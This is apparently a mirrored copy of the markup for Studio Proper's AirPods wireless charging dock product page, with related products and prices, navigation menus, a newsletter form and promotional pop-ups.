<div class="four columns alpha thumbnail even">
<figure style="text-align: center;"><img src="Bless_This_Stuff_LOGO.png" alt="Bless This Stuff Logo" style="display: block; margin-left: auto; margin-right: auto;" width="200"></figure>
</div>
<div class="four columns alpha thumbnail odd">
<figure style="text-align: center;"><img src="werd_LOGO_1200x400_3e99f7b3-dd8e-4cb2-8a0d-b3c031d3e697.png" alt="Werd Logo" style="display: block; margin-left: auto; margin-right: auto;" width="200"></figure>
</div>
</div>
</div>
<br>
<div>
<hr>
</div>


<hr>
<div>
<div class="featured_collections block__image-with-text clearfix grid-layout--standard  container ">
<div class="sixteen columns">
<section class="featured-link--section featured-link--image section-1">
<div class="featured-link--half featured-link--image">
<div class="featured-link--wrap"><a title="Sharing is Caring"> <img src="02_Studio-544_3000x2000_551599f3-8eec-45ab-b227-1c110f38fb04.jpg" alt=""> </a></div>
</div>
<div class="featured-link--half">
<div class="info text-align--left">
<a class="collection_title">A Place For Everything</a>
<div class="description">
<p>Keep your workspace tidy &amp; give your AirPods a proper place to rest.</p>
</div>
</div>
</div>
</section>
</div>
</div>
</div>
<div>
<div class="featured_collections block__image-with-text clearfix grid-layout--standard  container ">
<div class="sixteen columns">
<section class="featured-link--section featured-link--image section-2">
<div class="featured-link--half">
<div class="info text-align--left">
<a class="collection_title">Keep it Simple</a>
<div class="description">
<p>Designed to match the beauty and simplicity of the products that surround it.</p>
</div>
</div>
</div>
<div class="featured-link--half featured-link--image">
<div class="featured-link--wrap"><a title="Swivel Rotation"> <img src="03_Studio-1017_3000x2000_83409ae3-b27e-4525-9aee-032d7b43df66.jpg" alt=""> </a></div>
</div>
</section>
</div>
</div>
</div>
<div>
<br>
<hr>
</div>
<br>
<div class="sixteen columns">
<h4 class="title center">Featuring this product in an article?</h4>
<div style="text-align: center;"><span style="color: #ffffff;"><a href="https://cdn.shopify.com/s/files/1/2014/3029/files/Proper_Wireless_Charging_Dock_for_AirPods_-_PRESS_KIT.zip?77" target="_top" class="action_button action_button_solid" style="color: #ffffff;">Download the Wireless Charging Dock for AirPods Press Kit</a></span></div>
<br>
<div>
<br>
<hr>
</div>
</div>
        </div>
      </div>
      
    </div>

    
    <div id="shopify-product-reviews" data-id="3933212573807"></div>
    

            <div id="yotpo-testimonials-custom-tab"></div>
          </div>
        </div>
      </div>

    
  </div>
</div><div class="container">
  

  

  

  
  
  <br class="clear">
  <br class="clear">
  <div class="sixteen columns">
    <h4 class="title center">Related Items</h4>

    
    
    
    







<div itemtype="http://schema.org/ItemList" class="products">
  
    
      
        
          
  <div class="four columns alpha thumbnail even" itemprop="itemListElement" itemscope="" itemtype="http://schema.org/Product">


  
  

  

  <a href="https://www.studioproper.com/products/pencil-dock" itemprop="url">
    <div class="relative product_image">
      <div class="image__container" style=" max-width:2000px; ">
        <img src="0000s_0000s_0000_Studio_Proper_Ipad17_91690_300x.jpg" alt="Apple Pencil Dock with footprint" class="lazyload lazyload--mirage primary" style=" max-width:2000px;" data-sizes="auto">
          <div class="transition-helper">
          </div>
      </div>

      
        <img src="0000s_0000s_0000_Studio_Proper_Ipad17_91690_580x@2x.jpg" class="secondary" alt="Apple Pencil Dock with footprint">
      

      
    </div>
    <div class="info">
      <span class="title" itemprop="name">Apple Pencil Dock</span>
      
      

      
        <span class="price " itemprop="offers" itemscope="" itemtype="http://schema.org/Offer">
          <meta itemprop="price" content="14.95">
          <meta itemprop="priceCurrency" content="USD">
          <meta itemprop="seller" content="Studio Proper">
          <link itemprop="availability" href="http://schema.org/InStock">
          <meta itemprop="itemCondition" content="New">

          
            
            
              <span class="money">$14.95</span>
            
            
          
        </span>
      
    </div>
    

    
    
    
  </a>
  
</div>




          
            
          
        
      	
  	
  
    
      
        
          
  <div class="four columns  thumbnail odd" itemprop="itemListElement" itemscope="" itemtype="http://schema.org/Product">


  
  

  

  <a href="https://www.studioproper.com/products/apple-watch-dock" itemprop="url">
    <div class="relative product_image">
      <div class="image__container" style=" max-width:3000px; ">
        <img src="Watch-Dock_19-07-08_Studio-Shoot_004_3000x2000_8d1d306a-9e06-4ecc-80e1-db47571c5e86_300x.jpg" alt="Apple Watch Dock" class="lazyload lazyload--mirage primary" style=" max-width:3000px;" data-sizes="auto">
          <div class="transition-helper">
          </div>
      </div>

      
        <img src="WATWS-G_Pac-01.250_3000x2000_859c6103-17aa-42ad-bdf6-6c6356036814_580x@2x.jpg" class="secondary" alt="Apple Watch Dock">
      

      
    </div>
    <div class="info">
      <span class="title" itemprop="name">Apple Watch Dock</span>
      
      

      
        <span class="price " itemprop="offers" itemscope="" itemtype="http://schema.org/Offer">
          <meta itemprop="price" content="69.95">
          <meta itemprop="priceCurrency" content="USD">
          <meta itemprop="seller" content="Studio Proper">
          <link itemprop="availability" href="http://schema.org/InStock">
          <meta itemprop="itemCondition" content="New">

          
            
            
              <span class="money">$69.95</span>
            
            
          
        </span>
      
    </div>
    

    
    
    
  </a>
  
</div>




          
            
          
        
      	
  	
  
    
      
        
          
  <div class="four columns  thumbnail even" itemprop="itemListElement" itemscope="" itemtype="http://schema.org/Product">


  
  

  

  <a href="https://www.studioproper.com/products/pivot-bracket" itemprop="url">
    <div class="relative product_image">
      <div class="image__container" style=" max-width:2000px; ">
        <img src="0000s_0005s_0001_Studio_Proper_Ipad17_91547_baf1cc0d-51cd-415e-aa70-3712e4286ca7_300x.jpg" alt="Dual Screen Adapter with Proper Lock Belts" class="lazyload lazyload--mirage primary" style=" max-width:2000px;" data-sizes="auto">
          <div class="transition-helper">
          </div>
      </div>

      
        <img src="0000s_0005s_0001_Studio_Proper_Ipad17_91547_baf1cc0d-51cd-415e-aa70-3712e4286ca7_580x@2x.jpg" class="secondary" alt="Dual Screen Adapter with Proper Lock Belts">
      

      
    </div>
    <div class="info">
      <span class="title" itemprop="name">Dual Screen Adapter</span>
      
      

      
        <span class="price " itemprop="offers" itemscope="" itemtype="http://schema.org/Offer">
          <meta itemprop="price" content="59.95">
          <meta itemprop="priceCurrency" content="USD">
          <meta itemprop="seller" content="Studio Proper">
          <link itemprop="availability" href="http://schema.org/InStock">
          <meta itemprop="itemCondition" content="New">

          
            
              <small><em>from</em></small>
            
            
              <span class="money">$59.95</span>
            
            
          
        </span>
      
    </div>
    

    
    
    
  </a>
  
</div>




          
            
          
        
      	
  	
  
    
      
        
          
  <div class="four columns omega thumbnail odd" itemprop="itemListElement" itemscope="" itemtype="http://schema.org/Product">


  
  

  

  <a href="https://www.studioproper.com/products/flex-base-plate" itemprop="url">
    <div class="relative product_image">
      <div class="image__container" style=" max-width:2000px; ">
        <img src="Studio_Proper_Ipad17_91454_56723aa7-e696-4727-b6e2-5b1ba49b5531_300x.jpg" alt="customisable flex stand base" class="lazyload lazyload--mirage primary" style=" max-width:2000px;" data-sizes="auto">
          <div class="transition-helper">
          </div>
      </div>

      
        <img src="Studio_Proper_Ipad17_91454_56723aa7-e696-4727-b6e2-5b1ba49b5531_580x@2x.jpg" class="secondary" alt="customisable flex stand base">
      

      
    </div>
    <div class="info">
      <span class="title" itemprop="name">Flex Stand Base</span>
      
      

      
        <span class="price " itemprop="offers" itemscope="" itemtype="http://schema.org/Offer">
          <meta itemprop="price" content="39.95">
          <meta itemprop="priceCurrency" content="USD">
          <meta itemprop="seller" content="Studio Proper">
          <link itemprop="availability" href="http://schema.org/InStock">
          <meta itemprop="itemCondition" content="New">

          
            
            
              <span class="money">$39.95</span>
            
            
          
        </span>
      
    </div>
    

    
    
    
  </a>
  
</div>




          
            
    <br class="clear product_clear">

          
        
      	
  	
  
    
      
        
          
        
      	
  	
  
</div>
  </div>
  
  
</div><div id="shopify-section-footer" class="shopify-section footer-section"><div class="sub-footer">
  <div class="container">
    
      
        <div class="four columns">
          <h6 class="title">Shop</h6>
          <ul class="footer_menu">
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/ipad">iPad</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/iphone">iPhone</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/watch">Watch</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/proper-business">Business</a>
              </li>
              
            
          </ul>

          
        </div>
      
    
      
        <div class="four columns">
          <h6 class="title">Support</h6>
          <ul class="footer_menu">
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/about-us">About Us</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/help">Help</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/help#shippingandreturns">Shipping &amp; Returns</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/proper-business">Proper Business</a>
              </li>
              
            
              <li>
                <a class="" href="https://www.studioproper.com/pages/wholesale">Wholesale</a>
              </li>
              
            
          </ul>

          
        </div>
      
    
      
        <div class="four columns">
          
            <h6 class="title">About Studio Proper</h6>
          

          
            <p>Studio Proper&nbsp;is a Melbourne based product design studio dedicated to simplifying everyday experiences with technology.</p>
          

          
            <ul class="social_icons">
              
  <li class="twitter"><a href="http://www.twitter.com/studio_proper" title="Studio Proper on Twitter" rel="me" target="_blank"><span class="icon-twitter"></span></a></li>



  <li class="facebook"><a href="http://www.facebook.com/studioproperofficial" title="Studio Proper on Facebook" rel="me" target="_blank"><span class="icon-facebook"></span></a></li>









  <li class="pinterest"><a href="https://www.pinterest.com.au/studioproper/" title="Studio Proper on Pinterest" rel="me" target="_blank"><span class="icon-pinterest"></span></a></li>





  <li class="linkedin"><a href="https://www.linkedin.com/company/studio-proper/" title="Studio Proper on LinkedIn" rel="me" target="_blank"><span class="icon-linkedin"></span></a></li>



  <li class="instagram"><a href="http://www.instagram.com/studioproper" title="Studio Proper on Instagram" rel="me" target="_blank"><span class="icon-instagram"></span></a></li>








            </ul>
          
        </div>
      
    
      
        <div class="four columns">
          <h6 class="title">Let us send you emails?</h6>
          <p>Don't worry, we hate spam too. Just the best stuff from us.</p>
          <div class="newsletter  clearfix">
  <p class="message"></p>

  <form method="post" action="https://boring-varahamihira-5bc4be.netlify.app/contact#contact_form" id="contact_form" accept-charset="UTF-8" class="contact-form"><input type="hidden" name="form_type" value="customer"><input type="hidden" name="utf8" value="✓">
    

    
      <input type="hidden" name="contact[tags]" value="newsletter">
    

    
    

    <input type="hidden" name="challenge" value="false">
    <input type="email" class="contact_email" name="contact[email]" required="" placeholder="Enter your email address..." autocorrect="off" autocapitalize="off" value="">
    <input type="submit" class="action_button sign_up" value="Subscribe">
  </form>
</div>


          
        </div>
      
    
  </div>
</div>

<div class="footer">
  <div class="container">
    <div class="sixteen columns">
      <p class="credits">
        © 2019 <a href="https://www.studioproper.com/" title="">Studio Proper</a>.
        
        
        <a target="_blank" rel="nofollow" href="https://www.shopify.com/?utm_campaign=poweredby&amp;utm_medium=shopify&amp;utm_source=onlinestore">Ecommerce Software by Shopify</a>
      </p>
      
        <div class="payment_methods">
          <img src="cc-mastercard.png" alt="mastercard">
          <img src="cc-visa.png" alt="visa">
          <img src="cc-amex.png" alt="amex">
          <img src="cc-paypal.png" alt="paypal">
          <img src="cc-apple.png" alt="apple">
          
       
          
        </div>
      
    </div>
  </div>
</div>


 


</div><div id="search">
        <div class="container">
          <div class="ten columns offset-by-three center">
            <div class="right search-close">
              <span class="icon-close"></span>
            </div>
            <form action="https://boring-varahamihira-5bc4be.netlify.app/search">
              
              <input type="hidden" name="type" value="product">
              
              <span class="icon-search search-submit"></span>
              <input type="text" name="q" placeholder="Search Studio Proper..." value="" autocapitalize="off" autocomplete="off" autocorrect="off">
            </form>
          </div>
        </div>
      </div><div class="wc_geo_section" id="wc_geo_section">
  <div class="wc_geo_container">
    <div class="wc_geo_outer">
      <div class="wc_geo_inner">
        <h2>It looks like you are in <span class="wc_geo_country"></span>,<br>currently you are visiting our <span class="wc_geo_redirect"></span> website.</h2>
        <p class="wc_geo_btn">
          <a href="javascript:void(0)" class="wc_accept_btn">Take me to my local website</a>
          <a href="javascript:void(0)" class="wc_stay_here_btn">Continue to the global website →</a>
        </p>
      </div>
    </div>
  </div>
</div><div class="pop_wrapper_cnt">
	<div class="pop_up_box">
		<div class="pop_up_cnt">
			<h3>Add a FREE Proper ipad Case with your iPad</h3>
			<div class="popup_left_cnt">
			<img src="0000s_0003_Studio_Proper_IPhone_84791-SILVER_2048x.jpg" alt="">
			</div>
			<div class="popup_right_cnt">
			<h2>iPhone Wall Mount</h2>
			<p>The Prop Stand provides a secure home for compact payment devices. Designed to provide an elegant customer service experience and a tidy countertop. The Prop Stand has a tiny footprint, and features a retractable cord for when you need to extend the interaction (such as reaching over a raised counter, or for people in mobility aids).</p>
              <button>Add FREE iPad Case</button> 
			<div class="rev_cart_cnt">
				<a href="https://www.studioproper.com/cart">No thanks just take me to the cart → </a>
			</div>
		</div>
		</div>
	</div>
</div><div class="wc_pu_section">
  <div class="wc_pu_container">
    <div class="wc_pu_outer">
      <div class="wc_pu_inner">
        <div class="wc_pu_title">
          <h1>Add a FREE Proper iPad Case with your iPad</h1>
        </div>
        <div class="wc_pu_figure_section wc_custom_six">
          <figure>
            <img src="" alt="product_img">
          </figure>
        </div>
        <div class="wc_pu_details_section wc_custom_six">
          <div class="wc_pu_details_inner">
            <h2><a href="#" class="wc_pu_pro_name"></a></h2>
            <div class="wc_pu_desc"></div>
            <div class="wc_pu_variants"></div>
            <span class="wc_pu_add_to_Cart_button">Add to Cart</span>
            <a href="https://www.studioproper.com/cart" class="wc_pu_no_thanks">No thanks, Just take me to the Cart</a>
          </div>
        </div>
        
      </div>
    </div>
  </div>
</div><div class="wc_star_rating_section" id="wc_star_rating_section">
  <div class="wc_star_rating_container">
    <div class="wc_star_rating_outer">
      <div class="wc_star_rating_inner">
        <div class="wc_star_rating_close_div">
          <span class="wc_star_rating_close_btn">
            <svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="18px" height="18px" viewBox="0 0 41.756 41.756" style="enable-background:new 0 0 41.756 41.756;" xml:space="preserve">
              <g>
                <path d="M27.948,20.878L40.291,8.536c1.953-1.953,1.953-5.119,0-7.071c-1.951-1.952-5.119-1.952-7.07,0L20.878,13.809L8.535,1.465 c-1.951-1.952-5.119-1.952-7.07,0c-1.953,1.953-1.953,5.119,0,7.071l12.342,12.342L1.465,33.22c-1.953,1.953-1.953,5.119,0,7.071 C2.44,41.268,3.721,41.755,5,41.755c1.278,0,2.56-0.487,3.535-1.464l12.343-12.342l12.343,12.343 c0.976,0.977,2.256,1.464,3.535,1.464s2.56-0.487,3.535-1.464c1.953-1.953,1.953-5.119,0-7.071L27.948,20.878z"></path>
              </g>
            </svg>
          </span>
        </div>
       
        <div id="yotpo-testimonials-custom-tab"></div>
      </div>
    </div>
  </div>
</div></div>









<style>
  

  .sub-footer {
    margin-top: 0;
  }
</style>



      

      
      

      
    
    

    


    

    
    
    <style>.mw-product-options .mw-init-spinner{width:100%;text-align:center}.mw-product-options .mw-init-spinner>div{width:18px;height:18px;background-color:#999;border-radius:100%;display:inline-block;-webkit-animation:sk-bouncedelay 1.4s infinite ease-in-out both;animation:sk-bouncedelay 1.4s infinite ease-in-out both}.mw-product-options .mw-init-spinner .bounce1{-webkit-animation-delay:-.32s;animation-delay:-.32s}.mw-product-options .mw-init-spinner .bounce2{-webkit-animation-delay:-.16s;animation-delay:-.16s}@-webkit-keyframes sk-bouncedelay{0%,100%,80%{-webkit-transform:scale(0)}40%{-webkit-transform:scale(1)}}@keyframes sk-bouncedelay{0%,100%,80%{-webkit-transform:scale(0);transform:scale(0)}40%{-webkit-transform:scale(1);transform:scale(1)}}</style>
<script type="text/javascript"></script>

    
    
    
    <img id="scrolltop" src="back-to-top-02.svg" alt=""> 
    <script>
      $(document).ready(function() {

        var scrollTop = $("#scrolltop");

        $(window).scroll(function() {

          var topPos = $(this).scrollTop();

          if (topPos > 800) {
            $(scrollTop).fadeIn();

          } else {
            $(scrollTop).fadeOut();
          }

        }); 
        $(scrollTop).click(function() {
          $('html, body').animate({
            scrollTop: 0
          }, 800);
          return false;

        }); 
      }); 
    </script>


    
    

        
    


    











<style>
  .afterpay-paragraph {
      display: block !important;
   }
</style><div id="header" class="mm-fixed-top mobile-header mobile-sticky-header--true mm-slideout" data-search-enabled="false">
  <a href="#nav" class="icon-menu" aria-haspopup="true" aria-label="Menu" role="nav"><span>Menu</span></a>
  
    <a href="https://www.studioproper.com/" title="Studio Proper" class="mobile_logo_inside logo">
      
        <img src="proper-mobile-logo_410x.png" alt="Studio Proper">
      
    </a>
  
  <a href="#cart" class="icon-cart cart-button right"></a>
  <a href="#cart" class="icon-cart cart-button right no-js-only"></a>
 
</div><div class="header default-header mm-fixed-top behind-menu--false header_bar js-no-change mm-slideout">

  

  <div class="container">
    <div class="four columns logo ">
      <a href="https://www.studioproper.com/" title="Studio Proper">
        
          <img src="Proper_Logo_280x_2x_240x240_6b887461-1064-47c5-a958-b6e5a5726d97_280x@2x.png" alt="Studio Proper" class="primary_logo">

          
        
      </a>
    </div>

    <div class="twelve columns nav mobile_hidden">
      <ul class="menu" role="navigation">
        
        
          

            
            
            
            

            <li class="sub-menu" aria-haspopup="true" aria-expanded="false">
              <a href="https://www.studioproper.com/products/power-uno" class="dropdown-link active">Power
              <span class="arrow" hidden="">▾</span></a>
              <div class="dropdown  ">
                <ul>
                  
                  
                  
                    
                    <li><a class="active" href="https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods">Airpods Wireless Charging Dock</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/power-uno">Uno Wireless Charger</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/apple-watch-dock">Watch Dock</a></li>
                    

                    
                  
                </ul>
              </div>
            </li>
          
        
          

            
            
            
            

            <li class="sub-menu" aria-haspopup="true" aria-expanded="false">
              <a href="https://www.studioproper.com/pages/ipad" class="dropdown-link ">iPad
              <span class="arrow" hidden="">▾</span></a>
              <div class="dropdown dropdown-wide ">
                <ul>
                  
                  
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/cases-for-ipad">Connect iPad Cases</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-7th-gen-10-2-connect-shell-case">Connect iPad (7th Gen) 10.2" Case Kit (Pre-order)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-pro-11-connect-shell-case">Connect iPad Pro 11"Case Kit (Pre-order)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-connect-rugged-pro-bumper">Connect Bumper Cases</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-universal-connect-adapter">Universal Connect Adapter</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/pivot-stand">iPad Pivot Stand</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-wall-mount-disk">iPad Wall Mount</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-connect-arm">iPad Connect Arm</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/headrest-mount">iPad Headrest Mount</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-kick-stand">iPad Kick Stand</a></li>
                    

                    
                      
                      </ul>
                      <ul>
                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-hand-strap">iPad Hand Strap</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-shoulder-strap">iPad Shoulder Strap</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/vesa-arm-adapter">iPad Vesa Adaptor</a></li>
                    

                    
                  
                </ul>
              </div>
            </li>
          
        
          

            
            
            
            

            <li class="sub-menu" aria-haspopup="true" aria-expanded="false">
              <a href="https://www.studioproper.com/pages/iphone" class="dropdown-link active">iPhone
              <span class="arrow" hidden="">▾</span></a>
              <div class="dropdown dropdown-wide ">
                <ul>
                  
                  
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/leather-iphone-case">iPhone Xr Leather Case</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/leather-iphone-case">iPhone Xs Leather Case</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/leather-iphone-case">iPhone Xs Max Leather Case</a></li>
                    

                    
                  
                    
                    <li><a class="active" href="https://www.studioproper.com/products/wireless-charging-dock-for-apple-airpods">Airpods Wireless Charging Dock</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/power-uno">Uno Wireless Charger</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-x-case">iPhone X / Xs Case</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-8-case">iPhone 8 / 8 Plus Case</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-7-case">iPhone 7 / 7 Plus Case</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-6s-case">iPhone 6 / 6 Plus Case</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-glass-guard">iPhone Glass Guard</a></li>
                    

                    
                      
                      </ul>
                      <ul>
                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-car-mount">iPhone Car Mount</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-desk-stand">iPhone Desk Stand</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/wall-mount">iPhone Wall Mount</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-bike-mount">iPhone Bike Mount</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-tripod-mount">iPhone Tripod Mount</a></li>
                    

                    
                  
                </ul>
              </div>
            </li>
          
        
          

            
            
            
            

            <li class="sub-menu" aria-haspopup="true" aria-expanded="false">
              <a href="https://www.studioproper.com/pages/watch" class="dropdown-link ">Watch
              <span class="arrow" hidden="">▾</span></a>
              <div class="dropdown  ">
                <ul>
                  
                  
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/apple-watch-dock">Apple Watch Dock</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-desk-stand">Watch + iPhone Stand</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/wall-mount">Watch + iPhone Wall Mount</a></li>
                    

                    
                  
                </ul>
              </div>
            </li>
          
        
          

            
            
            
            

            <li class="sub-menu" aria-haspopup="true" aria-expanded="false">
              <a href="https://www.studioproper.com/pages/proper-business" class="dropdown-link ">Business
              <span class="arrow" hidden="">▾</span></a>
              <div class="dropdown dropdown-wide ">
                <ul>
                  
                  
                  
                    
                    <li><a class="" href="https://www.studioproper.com/pages/proper-business">All Solutions</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-swivel-stand">Powered iPad Swivel Stand for iPad 9.7" (5th &amp; 6th Gen)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-stand">Powered iPad Stand for iPad 9.7" (5th &amp; 6th Gen)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-wall-mount">Powered iPad Wall Mount for iPad 9.7" (5th &amp; 6th Gen)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/powered-ipad-swivel-stand-for-ipad-10-2-7th-gen">Powered iPad Swivel Stand for iPad 10.2" (7th Gen)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/powered-ipad-stand-for-ipad-10-2-7th-gen">Powered iPad Stand for iPad 10.2" (7th Gen)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/powered-ipad-wall-mount-for-ipad-10-2-7th-gen">Powered iPad Wall Mount for iPad 10.2" (7th Gen)</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/secure-iphone-stand">Secure iPhone Stand</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/dual-tablet-stand">Dual Tablet Stand</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-connect-arm">iPad Connect Arm</a></li>
                    

                    
                      
                      </ul>
                      <ul>
                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-mpos-kit">iPad mPOS Kit</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/iphone-mpos-kit">iPhone mPOS Kit</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-kiosk-stand-single-screen-business">iPad Kiosk - SIngle Screen</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-kiosk-stand-dual-screen-business">iPad Kiosk - Dual Screen</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/business-prop-stand">Payment Device Dock</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-pos-pivot-stand">iPad Pivot Stand</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/products/ipad-lock-belt-business">iPad Lock Belts</a></li>
                    

                    
                  
                </ul>
              </div>
            </li>
          
        
          
            <li>
              <a href="https://www.studioproper.com/pages/deals" class="top-link ">Gift Guides</a>
            </li>
          
        
          

            
            
            
            

            <li class="sub-menu" aria-haspopup="true" aria-expanded="false">
              <a href="https://www.studioproper.com/pages/help" class="dropdown-link ">...
              <span class="arrow" hidden="">▾</span></a>
              <div class="dropdown  dropdown-left">
                <ul>
                  
                  
                  
                    
                    <li><a class="" href="https://www.studioproper.com/pages/help">Contact</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/pages/help">Help</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/pages/help#shippingandreturns">Shipping &amp; Returns</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/pages/wholesale">Wholesale</a></li>
                    

                    
                  
                    
                    <li><a class="" href="https://www.studioproper.com/pages/about-us">About Us</a></li>
                    

                    
                  
                </ul>
              </div>
            </li>
          
        

        

        
          <li>
            <a href="https://www.studioproper.com/account" title="My Account " class="icon-account"></a>
          </li>
        
        
        
        <li> 
        
          
          <div class="counterylocation currencies">
  
  <ol>
    <li class="country_url"><a href="https://www.studioproper.com/"><img src="flag-us-c-1.png" alt="us"><span>$</span></a></li>
    <li class="country_url"><a href="https://www.studioproper.co.uk/"><img src="flag-uk-c-1.png" alt="uk"><span>£</span></a></li>
    <li class="country_url"><a href="https://www.studioproper.com.au/"><img src="flag-aus-c-1.png" alt="aus"><span>A$</span></a></li> 
  </ol>

</div>
        
        
        
        </li>
        <li>
          <a href="#cart" class="icon-cart cart-button"> <span>Cart</span></a>
          <a href="#cart" class="icon-cart cart-button no-js-only"> <span>Cart</span></a>
        </li>
      </ul>
    </div>
  </div>
</div><div id="mm-blocker" class="mm-slideout"></div><div id="Smallchat"></div></body>
</html>
